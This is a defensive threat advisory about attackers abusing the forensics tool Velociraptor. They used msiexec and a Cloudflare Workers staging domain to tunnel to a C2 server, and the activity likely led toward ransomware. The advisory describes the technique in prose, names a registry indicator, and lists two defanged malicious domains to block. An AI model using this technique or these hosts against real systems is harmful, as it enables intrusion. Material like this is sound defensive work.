What happened?
In August 2025, Sophos’ Counter Threat Unit observed an attempted cyber intrusion1 involving the deployment of Velociraptor - a legitimate open-source digital forensics and incident response (DFIR) tool - with the intention of creating a tunnel to a command and control (C2) server.
While attackers routinely look to exploit remote monitoring and management (RMM) tools, the use of Velociraptor marks a shift in tactics; instead of utilising custom curated malware, threat actors are now using incident response programs to gain initial access, reducing their malware footprint.
Velociraptor is a tool designed to help organisations detect and respond to cyber threats across their estate, enabling security teams to collect forensic data and hunt for indicators of compromise (evidence suggesting unauthorised access or malicious activity). This makes it invaluable for both identifying atypical behaviour and conducting investigations within enterprise environments.
So what?
In this campaign, the threat actor used the Windows "msiexec" utility to download an installer from a Cloudflare Workers domain, which served as a staging area for several of the attacker tools, including Cloudflare’s tunnelling tool and the remote administration tool, Radmin. The installer contained the Velociraptor binary, which was pre-configured to communicate with the attacker's server.
If this communication was successfully established, the threat actor could then use a series of encoded PowerShell commands - executable code that has been intentionally obfuscated to circumvent security restrictions and avoid detection - to download Visual Studio code from the same repository, executing further commands and establishing persistence on the compromised device.
What makes the above noteworthy is that this functionality is not a vulnerability in the tool itself. This recent intrusion instead creatively abuses intended features for malicious purposes.
Sophos' analysis concludes that this activity, had it been successful, would have likely led to the deployment of ransomware on the target system.
Ransomware typically encrypts critical data and disrupts essential business operations, often resulting in significant financial and reputational damage. Recovery from such an event may be prolonged, with potential costly legal and regulatory consequences if sensitive information is compromised.
What should I look out for?
Organisations are advised to monitor for unauthorised use of Velociraptor within their environment, treating any such unexpected activity as a potential precursor to ransomware.
Recommended actions include:
Review any activity logs for Velociraptor usage: when Velociraptor starts, the executable registers a new event log source with the name Velociraptor; this will, in turn, create a new key at the location HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\Velociraptor, which can be used as an indicator for any investigations.
Deploy endpoint detection and response (EDR) solutions: early detection is crucial; catching the attack before ransomware is deployed can greatly reduce its impact across your environment.
Monitor for unexpected tools and suspicious behaviour: limiting installations to only permit approved applications can reduce your attack surface, minimising any potential foothold an attacker can get.
Restrict access to known malicious indicators: to reduce the risk of exposure to this threat, consider using any available controls within your environment to prevent access to the resources below, which have been identified as part of this campaign - this will also ensure that any legitimate use of Velociraptor remains affected.
files[.]qaubctgg[.]workers[.]dev - Hosted tools
velo[.]qaubctgg[.]workers[.]dev - C2 server